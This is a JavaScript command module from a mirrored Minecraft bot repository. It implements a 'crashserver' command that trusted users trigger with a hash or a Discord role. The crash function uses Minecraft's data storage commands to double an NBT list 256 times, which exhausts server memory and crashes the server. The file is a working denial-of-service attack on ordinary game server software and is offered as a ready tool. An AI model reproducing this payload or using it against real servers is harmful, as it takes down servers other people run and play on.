mirror of
https://github.com/ChomeNS/chomens-bot-mc.git
synced 2024-11-14 18:54:55 -05:00
36 lines
972 B
JavaScript
36 lines
972 B
JavaScript
/* eslint-disable max-len */
|
|
const sleep = require('sleep-promise');
|
|
|
|
/**
|
|
* crash server
|
|
* @param {object} bot bot object
|
|
*/
|
|
async function crash(bot) {
|
|
bot.core.run('data merge storage crash {data:[0]}');
|
|
|
|
await sleep(1000);
|
|
|
|
for (let i = 0; i < 256; i++) bot.core.run('data modify storage crash data append from storage crash data[]');
|
|
}
|
|
|
|
module.exports = {
|
|
name: 'crashserver',
|
|
alias: [],
|
|
description: 'Crashes the server',
|
|
usage: '<hash>',
|
|
trusted: 1,
|
|
execute: function(bot, username, usernameraw, sender, prefix, args, config, hash, ownerhash, selector) {
|
|
if (args[0] === hash) {
|
|
crash(bot);
|
|
} else {
|
|
throw new Error('Invalid hash');
|
|
}
|
|
},
|
|
discordExecute: function(bot, username, usernameraw, sender, prefix, args, channeldc, message) {
|
|
if (message.member.roles.cache.some((role) => role.name === 'Trusted')) {
|
|
crash(bot);
|
|
} else {
|
|
throw new Error('You\'re not in the trusted role!');
|
|
}
|
|
},
|
|
};
|